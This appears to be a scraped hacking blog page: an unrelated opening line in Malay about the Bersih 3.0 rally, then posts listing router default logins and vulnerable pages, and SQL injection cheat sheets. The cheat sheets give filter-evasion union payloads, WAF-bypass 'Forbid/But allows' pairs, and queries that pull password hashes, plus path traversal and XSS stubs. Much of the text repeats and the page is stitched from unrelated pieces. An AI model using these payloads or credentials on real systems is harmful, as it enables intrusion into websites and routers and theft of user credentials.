Pada 28.4.2012 bersih 3.0 dan pakatan rakyat diketuai oleh pengerusi oleh ambiga dalangnya anuar ibrahim ketua atau wakil melayu untuk dipecah belahkan.bersih 3.0 dan bersih 2.0 akan tiba bersih 4.0. sama juga Bersih 2.0 dan Bersih 3.0 menjelang Bersih 4.0. lapan tuntutan dan 8 tuntutan bersih 3.0
Router Hacking
Posted by Yoo Mee
Posted on 9:28:00 PM
with 2 comments
#HTTP BANNER=RomPager/4.07 UPnP/1.0
LOGIN=admin:admin
BUGS=wizard/wizardPPP.htm
HTTP BANNER=RomPager/4.51 UPnP/1.0
LOGIN=tmadmin:tmadmin/tmuser:tmuser
BUGS=wzWAN_ManualCfg.html
LOGIN=admin:admin
BUGS=wizard/wizardPPP.htm
HTTP BANNER=RomPager/4.51 UPnP/1.0
LOGIN=tmadmin:tmadmin/tmuser:tmuser
BUGS=wzWAN_ManualCfg.html
[SQLi] Cheat Sheet
Posted by Yoo Mee
Posted on 9:24:00 PM
with No comments
group_concat(version(),0x3a,database())
##############################################
group_concat(schema_name)
from information_schema.schemata
##############################################
group_concat(table_name)
.tables where table_schema=database()
##############################################
group_concat(column_name)
.columns where table_schema=database()
##############################################
group_concat(schema_name)
from information_schema.schemata
##############################################
group_concat(table_name)
.tables where table_schema=database()
##############################################
group_concat(column_name)
.columns where table_schema=database()
[SQLi] Template
Posted by Yoo Mee
Posted on 9:24:00 PM
with No comments
ADDRESS:
BUGS:
VERSION:
CURRENT DB:
DATABASE:
TABLE:
COLUMN:
COMMENT:
#
#
#
BUGS:
VERSION:
CURRENT DB:
DATABASE:
TABLE:
COLUMN:
COMMENT:
#
#
#
[SQLi] Union Select/Union All Select
Posted by Yoo Mee
Posted on 9:07:00 PM
with No comments
/*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/
UNION SELECT
/*!UNION*/ +/*!ALL*/+/*!SELECT*/
/*!UNION*/ /*!SELECT*/
uNiOn SeLeCt
id=1' /*!12345union*/ select
UNIunionON SEselectLECT
/!*unioN*/ /*!SeLECT*/
and 1=2 union select
/**//*!union*//**//*!sElect*//**//*!aLl*//**/
/*!union*/+/*!select*/+/*!all*/
union select = %2f**/union%2f**/select
/*!UniON*/+/*!SelEct*/
and 1=2 union select
and 1=1 union select
SELECT * FROM articles WHERE id='-1' or 1=1
(0)union(select(table_name),column_name,…
0/**/union/*!50000select*/table_name`foo`/**/…
0%a0union%a0select%09group_concat(table_name)….
0′union all select all`table_name`foo from`information_schema`. `tables`
/*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/+1,2,3,4,5,6,7--
/**/uNiOn/**/SelEct/**/+1,2,3,4,5,6,7--
/*!UNION*/+/*!SELECT*/+1,2,3,4,5-
/**/union/**/select/**/+1,2,3,4,5--
id=1+union+select...
id=1+(UnIoN)+(SelECT)+
id=1+(UnIoN+SeLeCT)+
id=1+(UnI)(oN)+(SeL)(EcT)
id=1+’UnI”On’+'SeL”ECT’
id=1+’UnI’||’on’+SeLeCT’
id=“><script>...
id=/../../../etc/passwd
/(sel)(ect.+fr)(om)/is
/(uni)(on.+sel)(ect)/is
id=1; select 1,2,3
id=1/*union*/union/*select*/select+1,2,3/*
id=1/*uniX on*/union/*selX ect*/select+1,2,3/*
id=1+un/**/ion+sel/**/ect+1,2,3--
id=1;select+1&id=2,3+from+users+where+id=1--
id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users
a=1+union/*&b=*/select+1,2
?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
id=1+OR+0x50=0x50
id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=
id=1+union+(select+1,2+from+users)
/?id=1+union+(select+'xz'from+xxx)
/?id=(1)union(select(1),mid(hash,1,32)from(users))
/?id=1+union+(select'1',concat(login,hash)from+users)
/?id=(1)union(((((((select(1),hex(hash)from(users))))))))
/?id=(1)or(0x50=0x50)
Forbid: /?id=1+union+select+user,password+from+mysql.user+where+user=1
But allows: /?id=1+union+select+user,password+from+mysql.user+limit+0,1
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=substring((1),1,1)
But allows: /?id=mid((1),1,1)
Forbid: /?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74
But allows: /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=1+and+5=6
But allows: /?id=1+and+5!=6
Forbid: /?id=1;drop members
But allows: /?id=1;delete members
And allows: /?id=(1);exec('sel'+'ect(1)'+',(xxx)from'+'yyy')
UNION SELECT
/*!UNION*/ +/*!ALL*/+/*!SELECT*/
/*!UNION*/ /*!SELECT*/
uNiOn SeLeCt
id=1' /*!12345union*/ select
UNIunionON SEselectLECT
/!*unioN*/ /*!SeLECT*/
and 1=2 union select
/**//*!union*//**//*!sElect*//**//*!aLl*//**/
/*!union*/+/*!select*/+/*!all*/
union select = %2f**/union%2f**/select
/*!UniON*/+/*!SelEct*/
and 1=2 union select
and 1=1 union select
SELECT * FROM articles WHERE id='-1' or 1=1
(0)union(select(table_name),column_name,…
0/**/union/*!50000select*/table_name`foo`/**/…
0%a0union%a0select%09group_concat(table_name)….
0′union all select all`table_name`foo from`information_schema`. `tables`
/*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/+1,2,3,4,5,6,7--
/**/uNiOn/**/SelEct/**/+1,2,3,4,5,6,7--
/*!UNION*/+/*!SELECT*/+1,2,3,4,5-
/**/union/**/select/**/+1,2,3,4,5--
id=1+union+select...
id=1+(UnIoN)+(SelECT)+
id=1+(UnIoN+SeLeCT)+
id=1+(UnI)(oN)+(SeL)(EcT)
id=1+’UnI”On’+'SeL”ECT’
id=1+’UnI’||’on’+SeLeCT’
id=“><script>...
id=/../../../etc/passwd
/(sel)(ect.+fr)(om)/is
/(uni)(on.+sel)(ect)/is
id=1; select 1,2,3
id=1/*union*/union/*select*/select+1,2,3/*
id=1/*uniX on*/union/*selX ect*/select+1,2,3/*
id=1+un/**/ion+sel/**/ect+1,2,3--
id=1;select+1&id=2,3+from+users+where+id=1--
id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users
a=1+union/*&b=*/select+1,2
?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
id=1+OR+0x50=0x50
id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=
id=1+union+(select+1,2+from+users)
/?id=1+union+(select+'xz'from+xxx)
/?id=(1)union(select(1),mid(hash,1,32)from(users))
/?id=1+union+(select'1',concat(login,hash)from+users)
/?id=(1)union(((((((select(1),hex(hash)from(users))))))))
/?id=(1)or(0x50=0x50)
Forbid: /?id=1+union+select+user,password+from+mysql.user+where+user=1
But allows: /?id=1+union+select+user,password+from+mysql.user+limit+0,1
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=substring((1),1,1)
But allows: /?id=mid((1),1,1)
Forbid: /?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74
But allows: /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Forbid: /?id=1+OR+1=1
But allows: /?id=1+OR+0x50=0x50
Forbid: /?id=1+and+5=6
But allows: /?id=1+and+5!=6
Forbid: /?id=1;drop members
But allows: /?id=1;delete members
And allows: /?id=(1);exec('sel'+'ect(1)'+',(xxx)from'+'yyy')
[SQLi] Order By
Posted by Yoo Mee
Posted on 9:07:00 PM
with No comments
AND substring(version(),1,1)=5
'+order+by+1
"+order+by+1/*
'+order+by+1'--
+order+by+1/*
'+or+1=1+order+by+999/*
'+or+'a'='a+order+by+999/*
+or+1=1/*+order+by+999/*
'+order+by+1
"+order+by+1/*
'+order+by+1'--
+order+by+1/*
'+or+1=1+order+by+999/*
'+or+'a'='a+order+by+999/*
+or+1=1/*+order+by+999/*
[SQLi] Group Concat
Posted by Yoo Mee
Posted on 9:06:00 PM
with No comments
CoNcAt(version())
Group_Concat(table_name)
/*!group_concat(table_name)*/
/*!table_name*/
concat_ws(0x3a,user,password,host)
unhex(hex(concat_ws(0x3a,login,password )))
+or+1+group+by+concat
Group_Concat(table_name)
/*!group_concat(table_name)*/
/*!table_name*/
concat_ws(0x3a,user,password,host)
unhex(hex(concat_ws(0x3a,login,password )))
+or+1+group+by+concat
[SQLi] From Information Schema
Posted by Yoo Mee
Posted on 9:06:00 PM
with No comments
/**//*!from*//**//*!information_schema.tables*//**//*!where*//**//*!table_schema=database()*/--+-
from /*!information_schema*/.tables
/*!from*/ /*!InfoRmation_SCHEMa*/.`tables`
information_schema.tables LIMIT 1 OFFSET 44
information_schema.columns where table_name=CHAR(105, 110, 102, 111)
from /*!information_schema*/.tables
/*!from*/ /*!InfoRmation_SCHEMa*/.`tables`
information_schema.tables LIMIT 1 OFFSET 44
information_schema.columns where table_name=CHAR(105, 110, 102, 111)
[SQLi] And/Or
Posted by Yoo Mee
Posted on 9:05:00 PM
with No comments
+and 1=0-- -
+and 1=1-- -
+and '1'='1
+order+by+99999
+or+1=2
+and+1=2
'
"
\
/*
--+-
/**/
#####
'/*
"/*
'--
"--
';
";
--
;
‘ or 1=1#
‘ or 1=1–+-
‘ or 1=1/* (MySQL < 5.1)
' or 1=1;
' or 1=1 union select 1,2 as `
' or#newline
1='1
' or– -newline
1='1
' /*!50000or*/1='1
' /*!or*/1='1
+
–
~
!
‘ or –+2=- -!!!’2
‘||1=’1
‘&&1=’1
‘=’
‘-’
+and 1=1-- -
+and '1'='1
+order+by+99999
+or+1=2
+and+1=2
'
"
\
/*
--+-
/**/
#####
'/*
"/*
'--
"--
';
";
--
;
‘ or 1=1#
‘ or 1=1–+-
‘ or 1=1/* (MySQL < 5.1)
' or 1=1;
' or 1=1 union select 1,2 as `
' or#newline
1='1
' or– -newline
1='1
' /*!50000or*/1='1
' /*!or*/1='1
+
–
~
!
‘ or –+2=- -!!!’2
‘||1=’1
‘&&1=’1
‘=’
‘-’
